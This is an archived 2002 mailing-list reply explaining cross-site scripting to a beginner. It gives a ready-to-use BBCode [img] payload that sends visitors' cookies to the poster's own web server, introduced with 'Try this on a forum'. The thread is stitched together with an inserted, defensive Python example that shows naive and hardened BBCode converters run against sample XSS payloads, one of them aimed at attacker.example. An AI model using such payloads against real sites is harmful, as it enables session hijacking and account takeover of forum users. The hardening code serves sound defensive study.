Re: CSS Question
From: rat@r4t.tmfweb.nl
Date: 01/15/02
- Previous message: Meritt James: "Re: Looking for War Dialers"
- In reply to: A***: "CSS Question"
From: "rat@r4t.tmfweb.nl" <r4t@r4t.tmfweb.nl>
To: <security-basics@securityfocus.com>, "A***" <abdulla@mail.auk.kg>
Date: Tue, 15 Jan 2002 01:24:48 +0100
Well that's just the thing. If you are able to get the session of the
webforum admin, you can control it and administrate it. Sometimes forum
passwords are the same as login passwords... On the other hand some forums
do store passwds in their cookies.
Try this on a forum:
[img]javascript:window.open('htt'+'p://ww'+'w.wittenburg10c.nl/images/w.gif?cookie='+escape(document.cookie))[/img]
This got expanded to:
<img src=javascript:window.open('htt'+'p://ww'+'w.wittenburg10c.nl/images/w.gif?cookie='+escape(document.cookie))>
This will store the cookie in my webserver logs, and it worked for some
versions of a local forum. This is just a proof of concept and can be
much meaner, like hiding the newly opened window.
Have fun,
_rAt_
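The [img] expansion rAt describes, seen from the forum's side, as an added example (not code from the list, the forum, or the poster): a naive BBCode converter that reproduces the unsafe expansion beside a hardened one that allow-lists the URL scheme and quotes and escapes the attribute. Sample posts and host names are constructed placeholders.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample forum posts; attacker.example / forum.example are placeholders.
SAMPLE_POSTS = [
    "[img]javascript:window.open('htt'+'p://attacker.example/w.gif?c='+escape(document.cookie))[/img]",
    "[img]\tJaVa\nScRiPt:alert(1)[/img]",                          # tab/LF are dropped by browser URL parsers
    '[img]https://forum.example/a.gif" onerror="alert(1)[/img]',   # attempt to break out of the attribute
    "[img]https://forum.example/smile.gif[/img]",                  # legitimate image
]

_IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
_ALLOWED_SCHEMES = {"http", "https"}
_CONTROLS = "".join(map(chr, range(0x21))) + "\x7f"   # C0 controls, space, DEL


def naive_bbcode_img(text: str) -> str:
    """The unsafe expansion from the post: the [img] body is copied into an
    unquoted src attribute with no check on the URL scheme at all."""
    return _IMG_TAG.sub(lambda m: "<img src=" + m.group(1) + ">", text)


def safe_image_url(raw: str) -> Optional[str]:
    """Return the URL if it is a plain http(s) URL with a host, else None.
    Tab/CR/LF are removed anywhere and leading/trailing controls stripped,
    mirroring what browsers discard, so 'java<TAB>script:' cannot pass."""
    candidate = re.sub(r"[\t\r\n]", "", raw).strip(_CONTROLS)
    try:
        parts = urlsplit(candidate)          # lowercases the scheme for us
    except ValueError:
        return None
    if parts.scheme not in _ALLOWED_SCHEMES or not parts.netloc:
        return None
    return candidate


def hardened_bbcode_img(text: str) -> str:
    """Expand [img] only for validated http(s) URLs, inside a quoted and
    HTML-escaped attribute; anything else is shown as escaped literal text."""
    def repl(m: "re.Match[str]") -> str:
        url = safe_image_url(m.group(1))
        if url is None:
            return html.escape(m.group(0))   # render the tag text, never a tag
        return '<img src="%s">' % html.escape(url, quote=True)
    return _IMG_TAG.sub(repl, text)


if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print("naive:   ", naive_bbcode_img(post))
        print("hardened:", hardened_bbcode_img(post))
```

Scheme allow-listing alone is not enough: the third sample passes the scheme check, so the attribute must also be quoted and escaped, which is why the hardened converter does both.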
----- Original Message -----
From: "A***" <abdulla@mail.auk.kg>
To: <security-basics@securityfocus.com>
Sent: Saturday, January 12, 2002 1:43 PM
Subject: CSS Question
> Hi!
> There are a lot of CSS vuln discovered every day. As I have understood,
> cross site scripting is all about stealing a cookie, right? Cookies do not
> contain logins and passwords in them. So what is so important about them? I
> know that you can steal someone's session id and enter his mailbox, but still
> you are limited. I am not quite familiar with it, so my question is: what is the
> worst thing an attacker can do (besides stealing a cookie) with a website which is
> vulnerable to cross site scripting? Please enlighten me! Thanks